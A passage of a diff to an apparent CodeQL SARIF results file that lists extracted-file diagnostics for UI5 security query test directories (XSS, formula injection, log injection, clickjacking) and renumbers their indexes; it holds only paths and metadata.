} + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 123 } @@ -6234,7 +6288,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6246,7 +6300,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 124 } @@ -6260,7 +6314,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6272,7 +6326,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 125 } @@ -6286,7 +6340,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6298,7 +6352,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 126 } @@ -6312,7 +6366,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6324,7 +6378,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 127 } @@ -6338,7 +6392,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6350,7 +6404,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 128 } @@ -6364,7 +6418,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6376,7 +6430,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 129 } @@ -6390,7 +6444,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6402,7 +6456,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 130 } @@ -6416,7 +6470,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6428,7 +6482,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 131 } @@ -6442,7 +6496,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6454,7 +6508,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", "uriBaseId" : "%SRCROOT%", "index" : 132 } @@ -6468,7 +6522,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6480,7 +6534,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 133 } @@ -6494,7 +6548,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6506,7 +6560,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } @@ -6520,7 +6574,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6532,7 +6586,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 135 } @@ -6546,7 +6600,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6558,7 +6612,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 136 } @@ -6572,7 +6626,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6584,7 +6638,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 137 } @@ -6598,7 +6652,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6610,7 +6664,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 138 } @@ -6624,7 +6678,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6636,7 +6690,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 139 } @@ -6650,7 +6704,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6662,7 +6716,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 140 } @@ -6676,7 +6730,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6688,7 +6742,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 141 } @@ -6702,7 +6756,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6714,7 +6768,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 142 } @@ -6728,7 +6782,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6740,7 +6794,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 143 } @@ -6754,7 +6808,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6766,7 +6820,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", "uriBaseId" : "%SRCROOT%", "index" : 144 } @@ -6780,7 +6834,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6792,7 +6846,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 145 } @@ -6806,7 +6860,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6818,7 +6872,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 146 } @@ -6832,7 +6886,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6844,7 +6898,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 147 } @@ -6858,7 +6912,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6870,7 +6924,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", "uriBaseId" : "%SRCROOT%", "index" : 148 } @@ -6884,7 +6938,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6896,7 +6950,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", "uriBaseId" : "%SRCROOT%", "index" : 149 } @@ -6910,7 +6964,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6922,7 +6976,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 150 } @@ -6936,7 +6990,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6948,7 +7002,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 151 } @@ -6962,7 +7016,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6974,7 +7028,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 152 } @@ -6988,7 +7042,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7000,7 +7054,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 153 } @@ -7014,7 +7068,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7026,7 +7080,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 154 } @@ -7040,7 +7094,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7052,7 +7106,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 155 } @@ -7066,7 +7120,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7078,7 +7132,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 156 } @@ -7092,7 +7146,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7104,7 +7158,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 157 } @@ -7118,7 +7172,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7130,7 +7184,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 158 } @@ -7144,7 +7198,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7156,7 +7210,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 159 } @@ -7170,7 +7224,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7182,7 +7236,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 160 } @@ -7196,7 +7250,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7208,7 +7262,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 161 } @@ -7222,7 +7276,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7234,7 +7288,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 162 } @@ -7248,7 +7302,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7260,7 +7314,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 163 } @@ -7274,7 +7328,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7286,7 +7340,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 164 } @@ -7300,7 +7354,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7312,7 +7366,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } @@ -7326,7 +7380,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7338,7 +7392,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 166 } @@ -7352,33 +7406,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7390,7 +7418,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", "uriBaseId" : "%SRCROOT%", "index" : 167 } @@ -7404,7 +7432,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7416,7 +7444,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 168 } @@ -7430,7 +7458,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7442,7 +7470,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 169 } @@ -7456,7 +7484,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7468,7 +7496,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 170 } @@ -7482,7 +7510,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7494,7 +7522,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 171 } @@ -7508,7 +7536,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7520,7 +7548,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 172 } @@ -7534,7 +7562,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7546,7 +7574,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 173 } @@ -7560,7 +7588,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7572,7 +7600,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 174 } @@ -7586,7 +7614,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7598,7 +7626,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } @@ -7612,7 +7640,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7624,7 +7652,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 176 } @@ -7638,7 +7666,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7650,7 +7678,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 177 } @@ -7664,7 +7692,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7676,7 +7704,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } @@ -7690,7 +7718,7 @@ "id" : 